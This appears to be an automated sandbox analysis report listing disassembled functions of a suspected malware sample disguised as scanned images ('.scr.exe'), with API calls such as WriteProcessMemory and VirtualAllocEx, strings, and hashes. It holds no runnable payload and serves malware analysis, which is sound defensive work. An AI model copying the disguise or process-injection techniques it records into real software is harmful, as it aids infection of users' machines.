                                                                                • Instruction ID: eb01b8b4b222b8ed05f10483239796ec832c39e3c9079f3728506eca9a5c834d
                                                                                • Opcode Fuzzy Hash: d1f44561877719925fdcf06bd984d838db263a7980c34530c27b2ff103adb97b
                                                                                • Instruction Fuzzy Hash: DAF06D31006788EBC7264F64EC88B663B65AB22322F008224F425591F1D774499BEF2D
                                                                                Function 00480F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$_free
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3432400110-3206640213
                                                                                • Opcode ID: 2cf32d43858787bfddf2db20b74720dfc6441e489ff6e6c4365dbd76614b51bd
                                                                                • Instruction ID: 28bdc92f05109c1edeb900fb14c892de6229e83cc1e0014bdf6551fc5eca774a
                                                                                • Opcode Fuzzy Hash: 2cf32d43858787bfddf2db20b74720dfc6441e489ff6e6c4365dbd76614b51bd
                                                                                • Instruction Fuzzy Hash: F1D1D331900205CAEB25AF68C845AFFB7B8EF06700F14495BE905ABB61D37D9D83CB59
                                                                                Function 004D61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00470242: EnterCriticalSection.KERNEL32(0052070C,00521884,?,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047024D
                                                                                  • Part of subcall function 00470242: LeaveCriticalSection.KERNEL32(0052070C,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047028A
                                                                                  • Part of subcall function 004700A3: __onexit.LIBCMT ref: 004700A9
                                                                                • __Init_thread_footer.LIBCMT ref: 004D6238
                                                                                  • Part of subcall function 004701F8: EnterCriticalSection.KERNEL32(0052070C,?,?,00468747,00522514), ref: 00470202
                                                                                  • Part of subcall function 004701F8: LeaveCriticalSection.KERNEL32(0052070C,?,00468747,00522514), ref: 00470235
                                                                                  • Part of subcall function 004C359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004C35E4
                                                                                  • Part of subcall function 004C359C: LoadStringW.USER32(00522390,?,00000FFF,?), ref: 004C360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                • String ID: x#R$x#R$x#R
                                                                                • API String ID: 1072379062-4169567378
                                                                                • Opcode ID: f87dd7ac85cd8d4f9679f1759ad30120b7d84b7d38c96a26416280647d0f8bca
                                                                                • Instruction ID: b8f11610e78d5f35b1950b315f39de64def1f0e806bc82de073d090920cc64d6
                                                                                • Opcode Fuzzy Hash: f87dd7ac85cd8d4f9679f1759ad30120b7d84b7d38c96a26416280647d0f8bca
                                                                                • Instruction Fuzzy Hash: C5C17B71A00105ABCB14EF59D8A0EBAB7B9EF48304F11806FE9059B391DB78ED45CB99
                                                                                Function 00485AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: JOE
                                                                                • API String ID: 0-4078647249
                                                                                • Opcode ID: faff96f762d5cbee51d1821edaf495a0245764b5aff707f579d130e4e19cebbd
                                                                                • Instruction ID: ec665c1d7802b9e7d7e9bb2f6477486f65e625d6e4aa7639b49578954dfa7754
                                                                                • Opcode Fuzzy Hash: faff96f762d5cbee51d1821edaf495a0245764b5aff707f579d130e4e19cebbd
                                                                                • Instruction Fuzzy Hash: D4511075D006099FCB21BFA9C845FEFBBB8AF15314F10085BF404A7292D7399942CB6A
                                                                                Function 00488A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00488B6E
                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00488B7A
                                                                                • __dosmaperr.LIBCMT ref: 00488B81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                • String ID: .G
                                                                                • API String ID: 2434981716-1092520701
                                                                                • Opcode ID: bbae34bdba125c8f7410ffb479ca44e916e22b6dee9fff26c5a26de64fab5ecf
                                                                                • Instruction ID: 12ada02025360ea328d86a3cdbf68ca72813bcb5ab11bd5f0a650456d045d90a
                                                                                • Opcode Fuzzy Hash: bbae34bdba125c8f7410ffb479ca44e916e22b6dee9fff26c5a26de64fab5ecf
                                                                                • Instruction Fuzzy Hash: DB415E70504045AFDB24AF14C880A7E7FA6DFC6304B2849AFF89587683DE399C039758
                                                                                Function 004B2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004BB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004B21D0,?,?,00000034,00000800,?,00000034), ref: 004BB42D
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004B2760
                                                                                  • Part of subcall function 004BB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004B21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 004BB3F8
                                                                                  • Part of subcall function 004BB32A: GetWindowThreadProcessId.USER32(?,?), ref: 004BB355
                                                                                  • Part of subcall function 004BB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004B2194,00000034,?,?,00001004,00000000,00000000), ref: 004BB365
                                                                                  • Part of subcall function 004BB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004B2194,00000034,?,?,00001004,00000000,00000000), ref: 004BB37B
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004B27CD
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004B281A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: d191273f738626435f18ea34aefb4d87d6d151ff54e4392306b27685ca8ee68c
                                                                                • Instruction ID: f591848d7f6772c1c9a46a8bf0ecaa65ec13386a0ca3c1696fcfe18ab0d8be80
                                                                                • Opcode Fuzzy Hash: d191273f738626435f18ea34aefb4d87d6d151ff54e4392306b27685ca8ee68c
                                                                                • Instruction Fuzzy Hash: 08413D72900218AFDB10DFA4CD85AEEBBB8EF09704F00405AFA55B7191DBB46E45CBA4
                                                                                Function 0048172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe,00000104), ref: 00481769
                                                                                • _free.LIBCMT ref: 00481834
                                                                                • _free.LIBCMT ref: 0048183E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                                • API String ID: 2506810119-522377740
                                                                                • Opcode ID: 3a06ff13fd11fb8cc3296c10f1b22824bd9229374a762556be8340c8de8b7a62
                                                                                • Instruction ID: 0fb4a1dd96e239b9546a857600dbd312625bd0a1d7c15d0a78e11ed31f87c8a6
                                                                                • Opcode Fuzzy Hash: 3a06ff13fd11fb8cc3296c10f1b22824bd9229374a762556be8340c8de8b7a62
                                                                                • Instruction Fuzzy Hash: 95318275A00218EBDB21FB9A9881D9FBBFCEF95310F1045ABF80497321D6744E46DB98
                                                                                Function 004BC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004BC306
                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 004BC34C
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00521990,01298428), ref: 004BC395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem
                                                                                • String ID: 0
                                                                                • API String ID: 135850232-4108050209
                                                                                • Opcode ID: 923632adbda735f2458660c7adf44e1a87e91ac3b37b641cfaea51abe48f43c9
                                                                                • Instruction ID: fb722bf55f832e41b9e2ee36283a0c9e4de3ac023b55fe4312288e3c6403e778
                                                                                • Opcode Fuzzy Hash: 923632adbda735f2458660c7adf44e1a87e91ac3b37b641cfaea51abe48f43c9
                                                                                • Instruction Fuzzy Hash: 58419F312043419FD720DF25D8C4B9BBBE8AB85314F04865EFCA5972D1D778A905CB6A
                                                                                Function 004E4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004ECC08,00000000,?,?,?,?), ref: 004E44AA
                                                                                • GetWindowLongW.USER32 ref: 004E44C7
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004E44D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: d545433f41451448d049f68d78969cfb767a6ac5c823a14da744dfc07efc0779
                                                                                • Instruction ID: 93f3a3bd5ae080706ca5eb6d697e04d67d4e0ab656ba14b7f2ea84dffcfbf11d
                                                                                • Opcode Fuzzy Hash: d545433f41451448d049f68d78969cfb767a6ac5c823a14da744dfc07efc0779
                                                                                • Instruction Fuzzy Hash: EA31AF31200245AFDB208E39DC85BEB77A9EB48339F20472AF975922D1D778EC519754
                                                                                Function 004B6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SysReAllocString.OLEAUT32(?,?), ref: 004B6EED
                                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 004B6F08
                                                                                • VariantClear.OLEAUT32(?), ref: 004B6F12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyString
                                                                                • String ID: *jK
                                                                                • API String ID: 2173805711-3028746513
                                                                                • Opcode ID: 941af2c5788ecb76d3e84d66bfc04e24aa75d2d161d2ba2d7e4de1a3ddee4a45
                                                                                • Instruction ID: ec49f886c320d6dd6fca62aae52c1b907d0a51d075693ec2e150dbbd80b06ab2
                                                                                • Opcode Fuzzy Hash: 941af2c5788ecb76d3e84d66bfc04e24aa75d2d161d2ba2d7e4de1a3ddee4a45
                                                                                • Instruction Fuzzy Hash: DB31C171704245DBCB04AFA5E8909FE3775FF44309B1104AAF8064B2A2C73C9916CBE9
                                                                                Function 004D304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004D335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,004D3077,?,?), ref: 004D3378
                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004D307A
                                                                                • _wcslen.LIBCMT ref: 004D309B
                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 004D3106
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 946324512-2422070025
                                                                                • Opcode ID: 3d97110af4826a1ce0ca0e87d160dc534cc02494e364ce36fd2bca52cfab6d11
                                                                                • Instruction ID: c18cda244037d19329f4ed7053994d7c478a59b5f339687624df79f4f9c6094a
                                                                                • Opcode Fuzzy Hash: 3d97110af4826a1ce0ca0e87d160dc534cc02494e364ce36fd2bca52cfab6d11
                                                                                • Instruction Fuzzy Hash: 7031F539200202DFCB11CF28C595EAA77E0EF14319F24805BE9158B397C779EE46C766
                                                                                Function 004E4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004E4705
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004E4713
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004E471A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 84485e8790de5701b8d6cf6ae07cb336a16276cb89f6ee2401c3a72bfe57907f
                                                                                • Instruction ID: 8891b3ca2bbf2428691b741095714ea8b8f0b4e3ca2bb1fb8fd8f16489b0f591
                                                                                • Opcode Fuzzy Hash: 84485e8790de5701b8d6cf6ae07cb336a16276cb89f6ee2401c3a72bfe57907f
                                                                                • Instruction Fuzzy Hash: 0821A4B5600248AFDB10DF65DCC1DB737ADEF9A359B00015AFA009B351C734EC52DAA8
                                                                                Function 004B95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 176396367-2734436370
                                                                                • Opcode ID: 4568769ef3b90cd578b7d3507204ad7214426b1302ed87314169b771ad658d24
                                                                                • Instruction ID: b8360895cf14f1f69828dc713784d9851810ee1666a1d4a4f0fcd58b385a498a
                                                                                • Opcode Fuzzy Hash: 4568769ef3b90cd578b7d3507204ad7214426b1302ed87314169b771ad658d24
                                                                                • Instruction Fuzzy Hash: 9921387214411066C331AA269C02FFB73D89FA1314F24843FFB4997242EB5DAD46C2BE
                                                                                Function 004E37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004E3840
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004E3850
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004E3876
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: 40cd2c8033f37684fff2aeb7ca33bad3f382a6041162b0d067db20ff3c2c04b6
                                                                                • Instruction ID: 47b3242ad6ac8d22e0e53ea1f553c4aa4bf0e316f6a2cb385112c973037ae2a5
                                                                                • Opcode Fuzzy Hash: 40cd2c8033f37684fff2aeb7ca33bad3f382a6041162b0d067db20ff3c2c04b6
                                                                                • Instruction Fuzzy Hash: B52107726001587BEF129F56CC85FBB37AEEF89756F008125F9009B290C675DC52C794
                                                                                Function 004C49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C4A08
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004C4A5C
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,004ECC08), ref: 004C4AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                • Opcode ID: 8d688b984c08a888c94241b012db0d2d616dfa289169704cb85359101fed3191
                                                                                • Instruction ID: 12e05301e31500c13b0145791f7969b3953516f452707e331d66349464650420
                                                                                • Opcode Fuzzy Hash: 8d688b984c08a888c94241b012db0d2d616dfa289169704cb85359101fed3191
                                                                                • Instruction Fuzzy Hash: A3318E75A00108AFDB10DF54C985EAABBF8EF48308F1480AAF809DF252D775ED46CB65
                                                                                Function 004E41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004E424F
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004E4264
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004E4271
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
